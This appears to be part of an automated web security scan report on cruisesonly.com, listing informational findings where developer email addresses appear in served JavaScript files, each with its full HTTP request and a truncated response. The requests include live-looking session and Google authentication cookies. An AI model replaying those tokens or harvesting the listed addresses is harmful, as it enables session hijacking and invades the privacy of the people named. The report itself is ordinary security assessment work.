User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 1267
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Nov 2007 10:06:49 GMT
Accept-Ranges: bytes
ETag: "30fac88e6f32c81:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:42 GMT
Content-Length: 1267

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 11/17/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects that handle event-based programming
//                            in javascript
//--------------
...[SNIP]...
20.36. http://www.cruisesonly.com/lib/javascript/general/msgbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/general/msgbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/msgbox.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 12104
Content-Type: application/x-javascript
Last-Modified: Mon, 10 Sep 2007 17:51:46 GMT
Accept-Ranges: bytes
ETag: "f131a141d3f3c71:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:42 GMT
Content-Length: 12104

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// $Header: /WebSites/library/javascript/general/msgbox.js 13 8/24/07 12:59p Bpena $
//
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 7/20/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects and static methods for displaying
//                            dynamic inline message windows. I
...[SNIP]...
20.37. http://www.cruisesonly.com/lib/javascript/general/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/general/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/validation.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 2695
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 09:32:29 GMT
Accept-Ranges: bytes
ETag: "64793731875cc1:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:40:45 GMT
Content-Length: 2695


// Description : General javascript validation functions.
// File            : validation.js
// Created By    : Sanjeev Joshi(joshis@NLG.com)
// Created Date : 06/12/03


// The possible options for the zip to be invalid are
// 00000 or -ve number (parseFloat(vZip)<=0)
// // "." in the Zip entered ((vZip.indexOf('.') !== -1) )
// Al
...[SNIP]...
20.38. http://www.cruisesonly.com/lib/javascript/validation/messagingobjects.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/validation/messagingobjects.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/validation/messagingobjects.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 16882
Content-Type: application/x-javascript
Last-Modified: Thu, 29 May 2008 12:45:00 GMT
Accept-Ranges: bytes
ETag: "ca85bcce89c1c81:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:42:58 GMT
Content-Length: 16882

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 10/14/2003
// MODIFICATION HISTORY:
// PURPOSE: this file contains a set of validation objects
// and a message buffer.
//-
...[SNIP]...
20.39. http://www.cruisesonly.com/lib/javascript/validation/validating.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /lib/javascript/validation/validating.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/validation/validating.js HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.3.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 6847
Content-Type: application/x-javascript
Last-Modified: Mon, 07 Feb 2011 22:19:04 GMT
Accept-Ranges: bytes
ETag: "a0506f715c7cb1:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:41:57 GMT
Content-Length: 6847

// validates email sign up form
// $Header: /WebSites/library/javascript/validation/validating.js 4 1/25/11 2:21p Mccusker $

function validating(){
   if ((document.EmailForm.firstname.
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
eld.");
           document.EmailForm.email.focus();
return false;
       }else if (!validateEmail(document.EmailForm.email)){
           alert ("Please enter a Valid Email Address.\r(e.g., yourname@provider.com)")
           document.EmailForm.email.select();        
return false;
}else if (document.EmailForm.zip.value == ""){
           alert ("Your zip code is a required field.")
           
...[SNIP]...
20.40. http://www.cruisesonly.com/promotion/bermuda-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /promotion/bermuda-cruises.do

Issue detail

The following email address was disclosed in the response:

Request

GET /promotion/bermuda-cruises.do HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:23 GMT
Server: Apache
Content-Length: 116327
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:47:23 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.41. http://www.cruisesonly.com/sc.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /sc.do

Issue detail

The following email address was disclosed in the response:

Request

GET /sc.do?d=09/07/2011&d2=03/06/2014&i=848192&c=11&v=58&IncludeAlumniRates=&IncludeSeniorRates=&state=&zipcode=&dsc=y HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.2.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:18 GMT
Server: Apache
Set-Cookie: WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; Expires=Thu, 30-Sep-2021 12:41:18 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:41:18 GMT; Path=/
Set-Cookie: shoppingZipCode=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sid=6386; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:43:18 GMT;path=/
Cache-Control: private
Content-Length: 139727


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.42. https://www.cruisesonly.com/bcss/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...
<a href='mailto:customerservice@cruisesonly.com' class='smlink'>
...[SNIP]...
20.43. https://www.cruisesonly.com/lib/javascript/general/event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /lib/javascript/general/event.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/event.js HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.cruisesonly.com/bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 1267
Content-Type: application/x-javascript
Last-Modified: Thu, 29 Nov 2007 10:06:49 GMT
Accept-Ranges: bytes
ETag: "30fac88e6f32c81:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:44:52 GMT
Content-Length: 1267

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 11/17/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects that handle event-based programming
//                            in javascript
//--------------
...[SNIP]...
20.44. https://www.cruisesonly.com/lib/javascript/general/msgbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /lib/javascript/general/msgbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/general/msgbox.js HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.cruisesonly.com/bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 12104
Content-Type: application/x-javascript
Last-Modified: Mon, 10 Sep 2007 17:51:46 GMT
Accept-Ranges: bytes
ETag: "f131a141d3f3c71:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:44:52 GMT
Content-Length: 12104

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// $Header: /WebSites/library/javascript/general/msgbox.js 13 8/24/07 12:59p Bpena $
//
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 7/20/2005
// MODIFICATION HISTORY:
// PURPOSE: this file contains objects and static methods for displaying
//                            dynamic inline message windows. I
...[SNIP]...
20.45. https://www.cruisesonly.com/lib/javascript/validation/messagingobjects.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /lib/javascript/validation/messagingobjects.js

Issue detail

The following email address was disclosed in the response:

Request

GET /lib/javascript/validation/messagingobjects.js HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.cruisesonly.com/bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Cteonnt-Length: 16882
Content-Type: application/x-javascript
Last-Modified: Thu, 29 May 2008 12:45:00 GMT
Accept-Ranges: bytes
ETag: "ca85bcce89c1c81:6ad4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:44:52 GMT
Content-Length: 16882

//-----------------------------------------------------------------------------------------|
//-----------------------------------------------------------------------------------------|
// AUTHOR: Jeff Kody (kodyj@nlg.com)
// CREATED: 10/14/2003
// MODIFICATION HISTORY:
// PURPOSE: this file contains a set of validation objects
// and a message buffer.
//-
...[SNIP]...
20.46. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The following email address was disclosed in the response:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=cruise HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 143169

<!doctype html> <head> <title>cruise - Google Search</title> <script>window.google={kEI:"OK2JTrScBafRiALAoZTHDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=
...[SNIP]...
